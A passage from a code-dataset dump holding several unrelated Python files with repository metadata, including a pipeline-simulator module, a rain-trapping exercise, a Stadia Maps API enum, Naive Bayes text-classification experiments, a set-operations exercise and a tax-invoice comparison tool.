чек.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4087300740","text":"#!/usr/bin/python3\n\nimport sys\nimport os\n\nfrom numpy.lib.arraysetops import isin\n\nsys.path.append(\"..\")\n\nfrom config.data_types import *\nfrom config.register_name import register_name\n\n\nclass ModuleBase:\n def __init__(self) -> None:\n self.input_port = None\n self.output_port = None\n self.ports = {\n \"input\": {},\n \"output\": {},\n }\n\n\n# StateMachine\nclass Module(ModuleBase):\n # Transporting data through ports and tick the clock\n def tick(self, data):\n self.input_port = data\n if self.output_port is not None:\n # TODO: re-impl as pop()\n tmp = self.output_port\n self.output_port = None\n return tmp\n else:\n return None\n\n # Execute internal logic\n def step(self):\n if self.input_port is not None:\n # TODO: re-impl as push()\n self.output_port = self.op(self.input_port)\n self.input_port = None\n else:\n pass\n\n def op(self, data):\n pass\n\n def flush(self):\n self.input_port = None\n self.output_port = None\n for port_type in self.ports:\n for port in self.ports[port_type]:\n self.ports[port_type][port].data = None\n self.ports[port_type][port].update_status()\n\n\nclass Port:\n def __init__(self, name) -> None:\n self.name = name\n self.data = None\n self.valid = self.data is not None\n self.ready = self.data is None\n\n def update_status(self):\n self.valid = self.data is not None\n self.ready = self.data is None\n\n if os.environ.get(\"DEBUG_PRINT\") is not None:\n self.print()\n\n def print(self):\n print(\"{}: [valid:{} ready:{}]\".format(self.name, self.valid, self.ready))\n self.print_data(self.data)\n\n def print_data(self, data):\n if data is None:\n return\n\n # EX output data, multi-field\n # TODO: Trap info\n if isinstance(data, dict):\n if \"results\" in data:\n for issue_queue_data in data[\"results\"]:\n for item in issue_queue_data:\n print(\" [\")\n for k, v in item.items():\n if isinstance(v, word_type) or isinstance(v, double_type):\n print(\" {}: {:08x}\".format(k, v))\n else:\n print(\" {}: {}\".format(k, str(v)))\n print(\" ]\")\n else:\n print(\" [\")\n for k, v in data.items():\n if isinstance(v, word_type) or isinstance(v, double_type):\n print(\" {}: {:08x}\".format(k, v))\n else:\n print(\" {}: {}\".format(k, str(v)))\n print(\" ]\")\n\n elif isinstance(data, list):\n if isinstance(data[0], dict):\n for item in data:\n print(\" [\")\n for k, v in item.items():\n if isinstance(v, word_type) or isinstance(v, double_type):\n print(\" {}: {:08x}\".format(k, v))\n else:\n print(\" {}: {}\".format(k, str(v)))\n print(\" ]\")\n elif isinstance(data[0], list):\n for issue_queue_index, issue_queue_data in enumerate(data):\n print(\"Issue queue[{}]\".format(issue_queue_index))\n for item in issue_queue_data:\n print(\" [\")\n for k, v in item.items():\n if isinstance(v, word_type) or isinstance(v, double_type):\n print(\" {}: {:08x}\".format(k, v))\n else:\n print(\" {}: {}\".format(k, str(v)))\n print(\" ]\")\n","repo_name":"chaoRIOS/model","sub_path":"pipeline/module_base.py","file_name":"module_base.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33040120369","text":"#!/usr/bin/python3\n\"\"\" module to resolve the challenge of the rain\n\"\"\"\n\n\ndef rain(walls):\n \"\"\"retuirn tr number of water rainted in th walls\n \"\"\"\n res = 0\n for i in range(1, len(walls) - 1):\n left = walls[i]\n for j in range(i):\n left = max(left, walls[j])\n\n right = walls[i]\n for j in range(i + 1, len(walls)):\n right = max(right, walls[j])\n\n res = res + (min(left, right) - walls[i])\n\n return res\n","repo_name":"Jfprado11/holbertonschool-interview","sub_path":"0x10-rain/0-rain.py","file_name":"0-rain.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31094327703","text":"# coding: utf-8\n\n\"\"\"\n Stadia Maps Geospatial APIs\n\n The Stadia Maps Geospatial APIs provide you with the data you need to build awesome applications. # noqa: E501\n\n The version of the OpenAPI document: 5.0.6\n Contact: support@stadiamaps.com\n Generated by OpenAPI Generator (https://openapi-generator.tech)\n\n Do not edit the class manually.\n\"\"\"\n\n\nimport json\nimport pprint\nimport re # noqa: F401\nfrom aenum import Enum, no_arg\n\n\n\n\n\nclass NodeType(str, Enum):\n \"\"\"\n NodeType\n \"\"\"\n\n \"\"\"\n allowed enum values\n \"\"\"\n STREET_INTERSECTION = 'street_intersection'\n GATE = 'gate'\n BOLLARD = 'bollard'\n TOLL_BOOTH = 'toll_booth'\n MULTI_USE_TRANSIT_STOP = 'multi_use_transit_stop'\n BIKE_SHARE = 'bike_share'\n PARKING = 'parking'\n MOTOR_WAY_JUNCTION = 'motor_way_junction'\n BORDER_CONTROL = 'border_control'\n\n @classmethod\n def from_json(cls, json_str: str) -> NodeType:\n \"\"\"Create an instance of NodeType from a JSON string\"\"\"\n return NodeType(json.loads(json_str))\n\n\n","repo_name":"stadiamaps/stadiamaps-api-py","sub_path":"stadiamaps/models/node_type.py","file_name":"node_type.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"9587756113","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Importing Libraries\nimport pandas as pd\nfrom sklearn.naive_bayes import MultinomialNB, ComplementNB\n\n# Importing custom utility functions\nfrom utilities.data_loader import load_modeling_data, load_testing_data, prepare_kaggle_submission\nfrom utilities.text_cleaner import advanced_data_cleaning\n\n# Importing modeling utilities\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.preprocessing import LabelEncoder\nfrom skopt import BayesSearchCV\nfrom sklearn.metrics import accuracy_score, classification_report, confusion_matrix\nimport re\nimport nltk\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nstop_words = stopwords.words('english')\n\n\n# In[2]:\n\n\n# Loading Raw training and testing data\ntrain_data, train_labels = load_modeling_data()\ntest_data = load_testing_data()\n\n\n# In[3]:\n\n\nle = LabelEncoder()\ntrain_labels['target'] = le.fit_transform(train_labels['target'].values)\n\n\n# In[4]:\n\n\n# Splitting data for validation\n# Using 20% data for validation and keeping random_state 8 for consistency in stated results in report.\nX_train, X_val, y_train, y_val = train_test_split(train_data, train_labels, test_size=0.2, random_state = 8)\n\n\n# # Experiment 1: Making Baseline\n\n# In[5]:\n\n\n# Initializing Bag of Words instance (CountVectorizer)\nprint('-'*175+'Baseline Naive Bayes'+'-'*175)\nbow = CountVectorizer()\n\n\n# In[6]:\n\n\n# Fitting and training the bag of words\nX_train_bow = bow.fit_transform(X_train['text'])\nX_val_bow = bow.transform(X_val['text'])\n\n\n# In[7]:\n\n\nprint(\"shape of the bag of words matrix: \",X_train_bow.shape)\n\n\n# In[8]:\n\n\n# Initializing naive bayes classifier\nnb_clf_1 = MultinomialNB()\n\n\n# In[9]:\n\n\n# Training the classifier with default parameters\nnb_clf_1.fit(X_train_bow, y_train['target'].values)\n\n\n# In[10]:\n\n\n# Pridicting from the validation set\ny_pred_val = nb_clf_1.predict(X_val_bow)\n\n\n# In[11]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_pred_val))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_pred_val))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_pred_val))\n\n\n# In[ ]:\n\n\n\n\n\n# # Experiment 2: hyper parameter tuning \n\n# In[12]:\n\n\nprint('-'*175+'Naive Bayes Hyper parameter tuning'+'-'*175)\n\n\n# In[13]:\n\n\n# defining search grid\ngrid = {\n 'alpha': [0, 0.25, 1, 2, 3, 5, 10]\n}\n\n\n# In[14]:\n\n\n# Initializing bayesian search\nnb_clf_2 = BayesSearchCV(MultinomialNB(), grid, n_iter= 7)\n\n\n# In[15]:\n\n\n# Training for best hyperparameters\n_ = nb_clf_2.fit(X_train_bow, y_train['target'].values)\n\n\n# In[16]:\n\n\n# printing the best found parameters\nprint(\"Best found hyperparameters are: \")\nprint(nb_clf_2.best_params_)\n\n\n# In[17]:\n\n\nnb_clf_2 = MultinomialNB(alpha=2.0)\nnb_clf_2.fit(X_train_bow, y_train['target'].values)\ny_val_pred = nb_clf_2.predict(X_val_bow)\n\n\n# In[18]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_val_pred))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_val_pred))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_val_pred))\n\n\n# In[ ]:\n\n\n\n\n\n# # Experiment 3: Stemming\n\n# In[19]:\n\n\nprint('-'*175+'Naive Bayes with stemming'+'-'*175)\n\n\n# In[20]:\n\n\n# defining stemming function\ndef stemmer(text):\n porter = PorterStemmer()\n ls = [porter.stem(word) for word in text.split()]\n return ' '.join(ls)\n\n\n# In[21]:\n\n\n# making copy of dataframe and applying stemming to each text documents\nX_train_stem = X_train.copy()\nX_val_stem = X_val.copy()\nX_train_stem['text'] = X_train_stem['text'].apply(stemmer)\nX_val_stem['text'] = X_val_stem['text'].apply(stemmer)\n\n\n# In[22]:\n\n\nbow = CountVectorizer()\nX_train_bow = bow.fit_transform(X_train_stem['text'])\nX_val_bow = bow.transform(X_val_stem['text'])\n\n\n# In[23]:\n\n\nnb_clf_3 = MultinomialNB(alpha=2.0)\nnb_clf_3.fit(X_train_bow, y_train['target'].values)\ny_val_pred = nb_clf_3.predict(X_val_bow)\n\n\n# In[24]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_val_pred))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_val_pred))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_val_pred))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# # Experiment 4: Lemmatizing\n\n# In[25]:\n\n\nprint('-'*175+'Naive Bayes with lemmatizing'+'-'*175)\n\n\n# In[26]:\n\n\n# defining lemmatizing function\ndef lemmatizer(text):\n wordnet = WordNetLemmatizer()\n ls = [wordnet.lemmatize(word) for word in text.split()]\n return ' '.join(ls)\n\n\n# In[27]:\n\n\n# making copy of dataframe and applying lemmatizing to each text documents\nX_train_lemmatize = X_train.copy()\nX_val_lemmatize = X_val.copy()\nX_train_lemmatize['text'] = X_train_lemmatize['text'].apply(lemmatizer)\nX_val_lemmatize['text'] = X_val_lemmatize['text'].apply(lemmatizer)\n\n\n# In[28]:\n\n\nbow = CountVectorizer()\nX_train_bow = bow.fit_transform(X_train_lemmatize['text'])\nX_val_bow = bow.transform(X_val_lemmatize['text'])\n\n\n# In[29]:\n\n\nnb_clf_4 = MultinomialNB(alpha=2.0)\nnb_clf_4.fit(X_train_bow, y_train['target'].values)\ny_val_pred = nb_clf_4.predict(X_val_bow)\n\n\n# In[30]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_val_pred))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_val_pred))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_val_pred))\n\n\n# In[ ]:\n\n\n\n\n\n# # Experiment 5: Removing stopwords\n\n# In[31]:\n\n\nprint('-'*175+'Naive Bayes with stop words removal'+'-'*175)\n\n\n# In[32]:\n\n\n# defining stopwords remover function\ndef remove_stopwords(text):\n text = text.lower()\n ls = [word for word in text.split() if word not in stop_words]\n return ' '.join(ls)\n\n\n# In[33]:\n\n\n# making copy of dataframe and applying lemmatizing to each text documents\nX_train_stop = X_train.copy()\nX_val_stop = X_val.copy()\nX_train_stop['text'] = X_train_stop['text'].apply(remove_stopwords)\nX_val_stop['text'] = X_val_stop['text'].apply(remove_stopwords)\n\n\n# In[34]:\n\n\nbow = CountVectorizer()\nX_train_bow = bow.fit_transform(X_train_stop['text'])\nX_val_bow = bow.transform(X_val_stop['text'])\n\n\n# In[35]:\n\n\nnb_clf_5 = MultinomialNB(alpha=2.0)\nnb_clf_5.fit(X_train_bow, y_train['target'].values)\ny_val_pred = nb_clf_5.predict(X_val_bow)\n\n\n# In[36]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_val_pred))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_val_pred))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_val_pred))\n\n\n# In[ ]:\n\n\n\n\n\n# # Experiment 6: Advanced Text Cleaning\n\n# In[37]:\n\n\nprint('-'*175+'Naive Bayes with advanced text cleaning'+'-'*175)\n\n\n# In[38]:\n\n\n# making copy of dataframe and applying lemmatizing to each text documents\nX_train_clean = X_train.copy()\nX_val_clean = X_val.copy()\nX_train_clean['text'] = X_train_clean['text'].apply(advanced_data_cleaning)\nX_val_clean['text'] = X_val_clean['text'].apply(advanced_data_cleaning)\n\n\n# In[39]:\n\n\nbow = CountVectorizer()\nX_train_bow = bow.fit_transform(X_train_clean['text'])\nX_val_bow = bow.transform(X_val_clean['text'])\n\n\n# In[40]:\n\n\nnb_clf_6 = MultinomialNB(alpha=2.0)\nnb_clf_6.fit(X_train_bow, y_train['target'].values)\ny_val_pred = nb_clf_6.predict(X_val_bow)\n\n\n# In[41]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_val_pred))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_val_pred))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_val_pred))\n\n\n# In[ ]:\n\n\n# save the model to disk\nfilename = 'models/naive_bayes+BOW.sav'\njoblib.dump(nb_clf_6, filename)\n\n\n# # Finalizing model for Kaggle Submission\n\n# In[42]:\n\n\nprint(\"Naive Bayes experiments completed, starting retraining on full training data with best model for kaggle submission..\")\n\n\n# In[43]:\n\n\nX_train_final = train_data.copy()\nX_test_final = test_data.copy()\nX_train_final['text'] = X_train_final['text'].apply(advanced_data_cleaning)\nX_test_final['text'] = X_test_final['text'].apply(advanced_data_cleaning)\n\n\n# In[44]:\n\n\nbow = CountVectorizer()\nX_train_bow = bow.fit_transform(X_train_final['text'])\nX_test_bow = bow.transform(X_test_final['text'])\n\n\n# In[45]:\n\n\nnb_clf_6 = MultinomialNB(alpha=3.0)\nnb_clf_6.fit(X_train_bow, train_labels['target'].values)\ny_test_pred = nb_clf_6.predict(X_test_bow)\n\n\n# In[46]:\n\n\nprepare_kaggle_submission(y_test_pred, 'final-naive-bayes-advance-clean-bow-hp.csv')\n\n\n# In[47]:\n\n\n\nX_train_bow = X_train_bow.astype('float32')\nX_val_bow = X_val_bow.astype('float32')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kevalpipalia/Text-Classification-Challenge","sub_path":"NaiveBayes+BOW.py","file_name":"NaiveBayes+BOW.py","file_ext":"py","file_size_in_byte":8847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1075848428","text":"first_set = {int(el) for el in input().split()}\nsecond_set = {int(el) for el in input().split()}\n\nn = int(input())\n\nfor _ in range(n):\n data = input().split()\n command = \" \".join(data[0:2])\n numbers = [int(num) for num in data[2:]]\n\n if command == \"Add First\":\n first_set.update(numbers)\n\n elif command == \"Add Second\":\n second_set.update(numbers)\n\n elif command == \"Remove First\":\n for num in numbers:\n if num in first_set:\n first_set.remove(num)\n\n elif command == \"Remove Second\":\n for num in numbers:\n if num in second_set:\n second_set.remove(num)\n\n elif command == \"Check Subset\":\n if first_set.issubset(second_set) or second_set.issubset(first_set):\n print(\"True\")\n else:\n print(\"False\")\n\nfirst_set_sorted = [str(num) for num in sorted(first_set)]\nsecond_set_sorted = [str(num) for num in sorted(second_set)]\n\nprint(\", \".join(first_set_sorted))\nprint(\", \".join(second_set_sorted))","repo_name":"nmoskova/Python-advanced","sub_path":"01-Lists_as_stacks_and_queues/_numbers.py","file_name":"_numbers.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32923371752","text":"import os\nimport hashlib\n\nfrom bs4 import BeautifulSoup\n\nfrom src.model.taxinvoice import (\n TaxInvoice,\n InvoiceRow,\n ENCODING,\n OUTPUT_DIR_REFERRER,\n new_error,\n get_header_format,\n get_error_format,\n)\n\nfrom src import utils as u\nfrom src.utils import bcolors\n\nHEADER_REFERRER = [\"Commission Type\", \"Client\", \"Referrer Name\", \"Amount Paid\", \"GST Paid\", \"Total Amount Paid\"]\n\n\nclass ReferrerTaxInvoice(TaxInvoice):\n def __init__(self, directory, filename):\n TaxInvoice.__init__(self, directory, filename)\n self.filetext = self.get_file_text()\n self.pair = None\n self.datarows = {}\n self.datarows_count = {}\n self.summary_errors = []\n self.margin = 0\n self._key = self.__generate_key()\n self.parse()\n\n def get_file_text(self):\n file = open(self.full_path, \"r\")\n print(file)\n return file.read()\n\n # region Parsers\n def parse(self):\n soup = BeautifulSoup(self.filetext, \"html.parser\")\n\n self._from = self.parse_from(soup)\n self.from_abn = self.parse_from_abn(soup)\n self.to = self.parse_to(soup)\n self.to_abn = self.parse_to_abn(soup)\n self.bsb = self.parse_bsb(soup)\n self.account = self.parse_account(soup)\n self.final_total = self.parse_final_total(soup)\n self.parse_rows(soup)\n\n def parse_from(self, soup: BeautifulSoup):\n parts_info = self._get_parts_info(soup)\n _from = parts_info[1][:-4]\n _from = _from.strip()\n return _from\n\n def parse_from_abn(self, soup: BeautifulSoup):\n parts_info = self._get_parts_info(soup)\n abn = parts_info[2][:-3]\n abn = abn.strip()\n return abn\n\n def parse_to(self, soup: BeautifulSoup):\n parts_info = self._get_parts_info(soup)\n to = parts_info[3][:-4]\n to = to.strip()\n return to\n\n def parse_to_abn(self, soup: BeautifulSoup):\n parts_info = self._get_parts_info(soup)\n abn = parts_info[4][:-5]\n abn = abn.strip()\n return abn\n\n def parse_bsb(self, soup: BeautifulSoup):\n parts_account = self._get_parts_account(soup)\n bsb = parts_account[1].split(\" - \")[0].strip()\n return bsb\n\n def parse_account(self, soup: BeautifulSoup):\n parts_account = self._get_parts_account(soup)\n account = parts_account[2].split(\"/\")[0].strip()\n return account\n\n def parse_final_total(self, soup: BeautifulSoup):\n parts_account = self._get_parts_account(soup)\n final_total = \"$\" + parts_account[3].split(\"$\")[1].strip()\n return final_total\n\n def parse_rows(self, soup: BeautifulSoup):\n header = soup.find(\"tr\") # Find header\n header = header.extract() # Remove header\n header = header.find_all(\"th\")\n table_rows = soup.find_all(\"tr\")\n row_number = 0\n for tr in table_rows:\n row_number += 1\n tds = tr.find_all(\"td\")\n if len(header) == 6:\n row = ReferrerInvoiceRow(\n tds[0].text, tds[1].text, tds[2].text, tds[3].text, tds[4].text, tds[5].text, row_number\n )\n self.__add_datarow(row)\n else:\n row = ReferrerInvoiceRow(\n tds[0].text, tds[1].text, \"\", tds[2].text, tds[3].text, tds[4].text, row_number\n )\n self.__add_datarow(row)\n\n def _get_parts_info(self, soup: BeautifulSoup):\n body = soup.find(\"body\")\n extracted_info = body.find(\"p\").text\n info = \" \".join(extracted_info.split())\n parts_info = info.split(\":\")\n return parts_info\n\n def _get_parts_account(self, soup: BeautifulSoup):\n body = soup.find(\"body\")\n extracted_account = body.find(\"p\").find_next(\"p\").text\n account = \" \".join(extracted_account.split())\n parts_account = account.split(\":\")\n return parts_account\n\n # endregion\n\n def __generate_key(self):\n sha = hashlib.sha256()\n\n filename_parts = self.filename.split(\"_\")\n filename_parts = filename_parts[:-5] # Remove process ID and date stamp\n\n for index, part in enumerate(filename_parts):\n if part == \"Referrer\":\n del filename_parts[index - 1] # Remove year-month stamp\n\n filename_forkey = \"\".join(filename_parts)\n sha.update(filename_forkey.encode(ENCODING))\n return sha.hexdigest()\n\n def process_comparison(self, margin=0.000001):\n if self.pair is None:\n return None\n assert type(self.pair) == type(self), \"self.pair is not of the correct type\"\n self.margin = margin\n self.pair.margin = margin\n\n workbook = self.create_workbook(OUTPUT_DIR_REFERRER)\n fmt_table_header = get_header_format(workbook)\n fmt_error = get_error_format(workbook)\n\n worksheet = workbook.add_worksheet()\n row = 0\n col_a = 0\n col_b = 8\n\n format_ = fmt_error if not self.equal_from else None\n worksheet.write(row, col_a, \"From\")\n worksheet.write(row, col_a + 1, self._from, format_)\n row += 1\n format_ = fmt_error if not self.equal_from_abn else None\n worksheet.write(row, col_a, \"From ABN\")\n worksheet.write(row, col_a + 1, self.from_abn, format_)\n row += 1\n format_ = fmt_error if not self.equal_to else None\n worksheet.write(row, col_a, \"To\")\n worksheet.write(row, col_a + 1, self.to, format_)\n row += 1\n format_ = fmt_error if not self.equal_to_abn else None\n worksheet.write(row, col_a, \"To ABN\")\n worksheet.write(row, col_a + 1, self.to_abn, format_)\n row += 1\n format_ = fmt_error if not self.equal_bsb else None\n worksheet.write(row, col_a, \"BSB\")\n worksheet.write(row, col_a + 1, self.bsb, format_)\n row += 1\n format_ = fmt_error if not self.equal_account else None\n worksheet.write(row, col_a, \"Account\")\n worksheet.write(row, col_a + 1, self.account, format_)\n row += 1\n format_ = fmt_error if not self.equal_final_total else None\n worksheet.write(row, col_a, \"Total\")\n worksheet.write(row, col_a + 1, self.final_total, format_)\n\n if self.pair is not None:\n row = 0\n format_ = fmt_error if not self.pair.equal_from else None\n worksheet.write(row, col_b, \"From\")\n worksheet.write(row, col_b + 1, self.pair._from, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_from_abn else None\n worksheet.write(row, col_b, \"From ABN\")\n worksheet.write(row, col_b + 1, self.pair.from_abn, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_to else None\n worksheet.write(row, col_b, \"To\")\n worksheet.write(row, col_b + 1, self.pair.to, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_to_abn else None\n worksheet.write(row, col_b, \"To ABN\")\n worksheet.write(row, col_b + 1, self.pair.to_abn, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_bsb else None\n worksheet.write(row, col_b, \"BSB\")\n worksheet.write(row, col_b + 1, self.pair.bsb, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_account else None\n worksheet.write(row, col_b, \"Account\")\n worksheet.write(row, col_b + 1, self.pair.account, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_final_total else None\n worksheet.write(row, col_b, \"Total\")\n worksheet.write(row, col_b + 1, self.pair.final_total, format_)\n\n if not self.equal_from:\n self.summary_errors.append(\n new_error(\n self.filename, self.pair.filename, \"From does not match\", \"\", \"\", self._from, self.pair._from\n )\n )\n if not self.equal_from_abn:\n self.summary_errors.append(\n new_error(\n self.filename,\n self.pair.filename,\n \"From ABN does not match\",\n \"\",\n \"\",\n self.from_abn,\n self.pair.from_abn,\n )\n )\n if not self.equal_to:\n self.summary_errors.append(\n new_error(self.filename, self.pair.filename, \"To does not match\", \"\", \"\", self.to, self.pair.to)\n )\n if not self.equal_to_abn:\n self.summary_errors.append(\n new_error(\n self.filename,\n self.pair.filename,\n \"To ABN does not match\",\n \"\",\n \"\",\n self.to_abn,\n self.pair.to_abn,\n )\n )\n if not self.equal_bsb:\n self.summary_errors.append(\n new_error(self.filename, self.pair.filename, \"BSB does not match\", \"\", \"\", self.bsb, self.pair.bsb)\n )\n if not self.equal_account:\n self.summary_errors.append(\n new_error(\n self.filename,\n self.pair.filename,\n \"Account does not match\",\n \"\",\n \"\",\n self.account,\n self.pair.account,\n )\n )\n if not self.equal_final_total:\n self.summary_errors.append(\n new_error(\n self.filename,\n self.pair.filename,\n \"Total does not match\",\n \"\",\n \"\",\n self.final_total,\n self.pair.final_total,\n )\n )\n\n row += 2\n\n for index, item in enumerate(HEADER_REFERRER):\n worksheet.write(row, col_a + index, item, fmt_table_header)\n worksheet.write(row, col_b + index, item, fmt_table_header)\n row += 1\n\n keys_unmatched = set(self.pair.datarows.keys() - set(self.datarows.keys()))\n\n # Code below is just to find the errors and write them into the spreadsheets\n for key_full in self.datarows.keys():\n self_row = self.datarows[key_full]\n self_row.margin = margin\n\n pair_row = self.find_pair_row(self_row)\n self_row.pair = pair_row\n\n if pair_row is not None:\n # delete from pair list so it doesn't get matched again\n del self.pair.datarows[pair_row.key_full]\n # Remove the key from the keys_unmatched if it is there\n if pair_row.key_full in keys_unmatched:\n keys_unmatched.remove(pair_row.key_full)\n\n pair_row.margin = margin\n pair_row.pair = self_row\n self.summary_errors += ReferrerInvoiceRow.write_row(\n worksheet, self, pair_row, row, fmt_error, \"right\", write_errors=False\n )\n\n self.summary_errors += ReferrerInvoiceRow.write_row(worksheet, self, self_row, row, fmt_error)\n row += 1\n\n # Write unmatched records\n for key in keys_unmatched:\n self.summary_errors += ReferrerInvoiceRow.write_row(\n worksheet, self, self.pair.datarows[key], row, fmt_error, \"right\", write_errors=False\n )\n row += 1\n\n if len(self.summary_errors) > 0:\n workbook.close()\n else:\n del workbook\n return self.summary_errors\n\n def find_pair_row(self, row):\n # Match by full_key\n pair_row = self.pair.datarows.get(row.key_full, None)\n if pair_row is not None:\n return pair_row\n\n # We want to match by similarity before matching by the key\n # Match by similarity\n for _, item in self.pair.datarows.items():\n if row.equals(item):\n return item\n\n # Match by key\n for _, item in self.pair.datarows.items():\n if row.key == item.key:\n return item\n\n # Return None if nothing found\n return None\n\n def __add_datarow(self, row):\n if row.key_full in self.datarows.keys(): # If the row already exists\n self.datarows_count[row.key_full] += 1 # Increment row count for that key\n row.key_full = row._generate_key(self.datarows_count[row.key_full]) # Generate new key for the record\n self.datarows[row.key_full] = row # Add row to the list\n else:\n self.datarows_count[row.key_full] = 0 # Start counter\n self.datarows[row.key_full] = row # Add row to the list\n\n # region Properties\n @property\n def equal_from(self):\n if self.pair is None:\n return False\n return u.sanitize(self._from) == u.sanitize(self.pair._from)\n\n @property\n def equal_from_abn(self):\n if self.pair is None:\n return False\n return u.sanitize(self.from_abn) == u.sanitize(self.pair.from_abn)\n\n @property\n def equal_to(self):\n if self.pair is None:\n return False\n return u.sanitize(self.to) == u.sanitize(self.pair.to)\n\n @property\n def equal_to_abn(self):\n if self.pair is None:\n return False\n return u.sanitize(self.to_abn) == u.sanitize(self.pair.to_abn)\n\n @property\n def equal_bsb(self):\n if self.pair is None:\n return False\n return u.sanitize(self.bsb) == u.sanitize(self.pair.bsb)\n\n @property\n def equal_account(self):\n if self.pair is None:\n return False\n return u.sanitize(self.account) == u.sanitize(self.pair.account)\n\n @property\n def equal_final_total(self):\n if self.pair is None:\n return False\n return self.compare_numbers(self.final_total, self.pair.final_total, self.margin)\n\n # endregion\n\n\nclass ReferrerInvoiceRow(InvoiceRow):\n def __init__(self, commission_type, client, referrer, amount_paid, gst_paid, total, row_number):\n InvoiceRow.__init__(self)\n self._pair = None\n self._margin = 0\n\n self.commission_type = commission_type\n self.client = client\n self.referrer = referrer\n self.amount_paid = amount_paid\n self.gst_paid = gst_paid\n self.total = total\n\n self.row_number = row_number\n\n self._key = self._generate_key()\n self._key_full = self.__generate_key_full()\n\n # region Properties\n @property\n def key(self):\n return self._key\n\n @key.setter\n def key(self, k):\n self._key = k\n\n @property\n def key_full(self):\n return self._key_full\n\n @key_full.setter\n def key_full(self, k):\n self._key_full = k\n\n @property\n def pair(self):\n return self._pair\n\n @pair.setter\n def pair(self, pair):\n self._pair = pair\n\n @property\n def margin(self):\n return self._margin\n\n @margin.setter\n def margin(self, margin):\n self._margin = margin\n\n @property\n def equal_commission_type(self):\n if self.pair is None:\n return False\n return u.sanitize(self.commission_type) == u.sanitize(self.pair.commission_type)\n\n @property\n def equal_client(self):\n if self.pair is None:\n return False\n return u.sanitize(self.client) == u.sanitize(self.pair.client)\n\n @property\n def equal_referrer(self):\n if self.pair is None:\n return False\n return u.sanitize(self.referrer) == u.sanitize(self.pair.referrer)\n\n @property\n def equal_amount_paid(self):\n if self.pair is None:\n return False\n return self.compare_numbers(self.amount_paid, self.pair.amount_paid, self.margin)\n\n @property\n def equal_gst_paid(self):\n if self.pair is None:\n return False\n return self.compare_numbers(self.gst_paid, self.pair.gst_paid, self.margin)\n\n @property\n def equal_total(self):\n if self.pair is None:\n return False\n return self.compare_numbers(self.total, self.pair.total, self.margin)\n\n # endregion Properties\n\n def _generate_key(self, salt=\"\"):\n sha = hashlib.sha256()\n sha.update(u.sanitize(self.commission_type).encode(ENCODING))\n sha.update(u.sanitize(self.client).encode(ENCODING))\n sha.update(u.sanitize(self.referrer).encode(ENCODING))\n sha.update(str(salt).encode(ENCODING))\n return sha.hexdigest()\n\n def __generate_key_full(self, salt=\"\"):\n sha = hashlib.sha256()\n sha.update(self.commission_type.encode(ENCODING))\n sha.update(self.client.encode(ENCODING))\n sha.update(self.referrer.encode(ENCODING))\n sha.update(self.amount_paid.encode(ENCODING))\n sha.update(self.gst_paid.encode(ENCODING))\n sha.update(self.total.encode(ENCODING))\n sha.update(str(salt).encode(ENCODING))\n return sha.hexdigest()\n\n def equals(self, obj):\n if type(obj) != ReferrerInvoiceRow:\n return False\n\n return (\n u.sanitize(self.commission_type) == u.sanitize(obj.commission_type)\n and u.sanitize(self.client) == u.sanitize(obj.client)\n and u.sanitize(self.referrer) == u.sanitize(obj.referrer)\n and self.compare_numbers(self.amount_paid, obj.amount_paid, self.margin)\n and self.compare_numbers(self.gst_paid, obj.gst_paid, self.margin)\n and self.compare_numbers(self.total, obj.total, self.margin)\n )\n\n @staticmethod\n def write_row(worksheet, invoice, element, row, fmt_error, side=\"left\", write_errors=True):\n col = 0\n if side == \"right\":\n col = 8\n\n worksheet.write(row, col, element.commission_type)\n worksheet.write(row, col + 1, element.client)\n worksheet.write(row, col + 2, element.referrer)\n\n format_ = fmt_error if not 